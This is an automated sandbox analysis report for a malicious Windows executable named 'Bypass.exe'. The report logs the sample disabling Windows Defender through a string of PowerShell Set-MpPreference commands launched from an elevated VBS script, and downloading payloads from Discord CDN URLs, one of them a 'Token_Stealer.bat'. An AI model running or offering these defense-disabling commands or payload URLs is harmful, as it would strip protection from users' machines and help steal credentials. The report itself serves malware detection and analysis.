Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 22, 2021, 10:19 a.m.	March 22, 2021, 10:23 a.m.

Size	12.6MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`897aabd3ac16050d62b8aacf85541454`
SHA256	`1d2ca907c73941dfcd91aa2ef0b96ecc137146be0dfd654e52f9408100f8fbbb`
CRC32	`1C62E9AE`
ssdeep	`98304:tNe4YEmqvxHf+c1JgNuasG5Oi/d+nPJWvioOkSgxgpDhsoCIP6WRalZLCwpokCFH:QJCmuasG5Oi1+hWviPDthPV`
Yara	PE_Header_Zero - PE File Signature Zero OS_Processor_Check_Zero - OS Processor Check Signature Zero network_tor - Communications over TOR network network_dropper - File downloader/dropper screenshot - Take screenshot keylogger - Run a keylogger win_registry - Affect system registries win_files_operation - Affect private profile Str_Win32_Internet_API - Match Windows Inet API call IsPE32 - (no description) IsWindowsGUI - (no description) HasDebugData - DebugData Check borland_delphi - Borland Delphi 2.0 - 7.0 / 2005 - 2007

Bypass.exe "C:\Users\test22\AppData\Local\Temp\Bypass.exe"
7144
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\Disable.vbs"
  8088
  - wscript.exe "C:\Windows\SysWOW64\WScript.exe" "C:\Windows\Disable.vbs" /elevate
    3700
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
      8704
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
      3360
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      5256
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      8772
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      2600
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      3980
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      3632
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      7352
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      3716
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      4640
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      1616
- Machos1.exe "C:\Windows\Machos1.exe"
  6692

Name	Response	Post-Analysis Lookup
raw.githubusercontent.com	A 185.199.109.133 A 185.199.111.133 A 185.199.110.133 A 185.199.108.133	185.199.108.133
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.130.233

IP Address	Status	Action
162.159.129.233	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
185.199.111.133	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49806 -> 162.159.129.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49828 -> 185.199.111.133:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49805 -> 162.159.129.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49807 -> 162.159.129.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49827 -> 162.159.129.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49806 162.159.129.233:443	None	None	None
TLSv1 192.168.56.102:49805 162.159.129.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.102:49807 162.159.129.233:443	None	None	None
TLSv1 192.168.56.102:49827 162.159.129.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

Queries for the computername (50 out of 66 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 22, 2021, 10:19 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (13 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0
IsDebuggerPresent March 22, 2021, 10:19 a.m.			0	0

Command line console output was observed (50 out of 88 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + Set-MpPreference <<<< -DisableRealtimeMonitoring $true console_handle: 0x00000053	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + Set-MpPreference <<<< -DisableBehaviorMonitoring $true console_handle: 0x00000053	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + Set-MpPreference <<<< -DisableBlockAtFirstSeen $true console_handle: 0x00000053	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + Set-MpPreference <<<< -DisableIOAVProtection $true console_handle: 0x00000053	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + Set-MpPreference <<<< -DisableScriptScanning $true console_handle: 0x00000053	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + Set-MpPreference <<<< -SubmitSamplesConsent 2 console_handle: 0x00000053	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW March 22, 2021, 10:19 a.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 506 events)

Time & API	Arguments	Status	Return
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa4a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fada8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fada8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fada8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fada8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fada8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fada8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa928 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005faa68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005fa628 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056b158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056b858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056b858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 22, 2021, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056b858 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 22, 2021, 10:19 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	.itext
section	.didata
section	.debug

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://cdn.discordapp.com/attachments/790590543397781576/821075940146282537/Token_Stealer.bat

Performs some HTTP requests (4 events)

request	GET https://cdn.discordapp.com/attachments/790590543397781576/816661031254229033/Disable.vbs
request	GET https://cdn.discordapp.com/attachments/790590543397781576/821076672370573422/Machos1.exe
request	GET https://cdn.discordapp.com/attachments/790590543397781576/820879760904683561/System.exe
request	GET https://cdn.discordapp.com/attachments/790590543397781576/821075940146282537/Token_Stealer.bat

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1563 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 7144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 7144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 8088 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000720000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2a6b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000ba0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
